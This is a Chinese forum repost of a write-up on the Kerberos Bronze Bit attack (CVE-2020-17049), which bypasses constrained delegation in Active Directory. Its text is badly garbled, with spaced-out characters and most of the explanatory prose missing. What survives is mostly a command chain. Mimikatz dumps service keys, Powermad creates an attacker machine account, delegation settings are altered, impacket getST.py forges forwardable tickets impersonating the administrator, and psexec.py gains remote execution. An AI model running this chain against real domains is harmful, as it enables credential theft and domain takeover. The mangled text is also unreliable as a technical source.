[1160] 2020-12-15_KerberosBronzeBitAttack绕过约束委派限制

文档创建者:s7ckTeam
浏览次数:0
最后更新:2025-01-16
2020-12-15_KerberosBronzeBitAttack绕过约束委派限制 K e r b e r o s   B r o n z e   B i t   A t t a c k   Y 4 e r   C h a B u g   2 0 2 0 - 1 2 - 1 5 K e r b e r o s   B r o n z e   B i t   A t t a c k K e r b e r o s n e t s p i J a k e   K a r n e s C V E - 2 0 2 0 - 1 7 0 4 9 1 . / 2 . D C S e r v i c e 1 使 K e r b e r o s 使
s p n s q l


1 . 2 . M a c h i n e A c c o u n t Q u o t a
1 . j a c k @ t e s t . l o c a l 2 . S e r v i c e 1 h a s h 3 . S e r v i c e 1 S e r v i c e 2 4 . S e r v i c e 1 S e r v i c e 2 p t t S e r v i c e 2 [ 1 ] K e r b e r o s   B r o n z e   B i t   A t t a c k S e r v i c e 1 h a s h a e s k e y S e r v i c e 1 h a s h 使 S e r v i c e 1 t e s t 1 2 3 ! @ # r u n a s   / u s e r : S e r v i c e 1 a d m i n i s t r a t o r   m i m i k a t z p r i v i l e g e : : d e b u g s e k u r l s a : : e k e y s
使 i m p a c k e t S e r v i c e 2 s e r v i c e 1 p y t h o n 3   g e t S T . p y   - s p n   c i f s / S e r v i c e 2 . t e s t . l o c a l   - i m p e r s o n a t e   a d m i n i s t r a t o r   - h a s h e s   A A D 3 B 4 3 5 B 5 1 4 0 4 E E A A D 3 B 4 3 5 B 5 1 4 0 4 E E : a a 0 9 c e c b 1 7 2 8 c d 5 c a d 6 e 7 7 9 c 7 f 3 7 0 5 6 3   - a e s K e y   7 1 f 9 c a f 9 2 0 3 5 7 5 b b b e 7 6 0 e 6 a 6 6 9 d 9 0 c b e 3 9 b e 0 b 5 a 4 4 2 4 9 6 2 9 5 e 2 f 6 3 9 9 0 e e 8 5 8 f   t e s t . l o c a l / S e r v i c e 1   - f o r c e - f o r w a r d a b l e
a d s i j a c k s e r v i c e 2
p o w e r m a d A t t a c k e r S e r v i c e A t t a c k e r S e r v i c e P a s s w o r d j a c k s e r v i c e 1 m i m i k a t z h a s h 使 P o w e r S h e l l   A c t i v e   D i r e c t o r y A t t a c k e r S e r v i c e S e r v i c e 2 p o w e r s h e l l A c t i v e   D i r e c t o r y I m p o r t - M o d u l e   . P o w e r m a d p o w e r m a d . p s 1 N e w - M a c h i n e A c c o u n t   - M a c h i n e A c c o u n t   A t t a c k e r S e r v i c e   - P a s s w o r d   $ ( C o n v e r t T o - S e c u r e S t r i n g   ' A t t a c k e r S e r v i c e P a s s w o r d '   - A s P l a i n T e x t   - F o r c e ) M i c r o s o f t . A c t i v e D i r e c t o r y . M a n a g e m e n t . d l l I m p o r t - M o d u l e   . M i c r o s o f t . A c t i v e D i r e c t o r y . M a n a g e m e n t . d l l G e t - A D C o m p u t e r   A t t a c k e r S e r v i c e   # S e t - A D C o m p u t e r   S e r v i c e 2   - P r i n c i p a l s A l l o w e d T o D e l e g a t e T o A c c o u n t   A t t a c k e r S e r v i c e $ G e t - A D C o m p u t e r   S e r v i c e 2   - P r o p e r t i e s   P r i n c i p a l s A l l o w e d T o D e l e g a t e T o A c c o u n t
h a s h e s a e s K e y A t t a c k e r S e r v i c e m i m i k a t z K e r b e r o s   B r o n z e   B i t   A t t a c k K e r b e r o s 1 . h t t p s : / / b l o g . n e t s p i . c o m / c v e - 2 0 2 0 - 1 7 0 4 9 - k e r b e r o s - b r o n z e - b i t - a t t a c k / R e f e r e n c e s p y t h o n 3   g e t S T . p y   - s p n   c i f s / S e r v i c e 2 . t e s t . l o c a l   - i m p e r s o n a t e   a d m i n i s t r a t o r   - h a s h e s   8 3 0 f 8 d f 5 9 2 f 4 8 b c 0 3 6 a c 7 9 a 2 b b 8 0 3 6 c 5 : 8 3 0 f 8 d f 5 9 2 f 4 8 b c 0 3 6 a c 7 9 a 2 b b 8 0 3 6 c 5   - a e s K e y   2 a 6 2 2 7 1 b d c 6 2 2 6 c 1 1 0 6 c 1 e d 8 d c b 5 5 4 c b f 4 6 f b 9 9 d d a 3 0 4 c 4 7 2 5 6 9 2 1 8 c 1 2 5 d 9 f f c   t e s t . l o c a l / A t t a c k e r S e r v i c e   - f o r c e - f o r w a r d a b l e e x p o r t   K R B 5 C C N A M E = a d m i n i s t r a t o r . c c a c h e p y t h o n 3   p s e x e c . p y   - n o - p a s s   - k   S e r v i c e 2 . t e s t . l o c a l
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则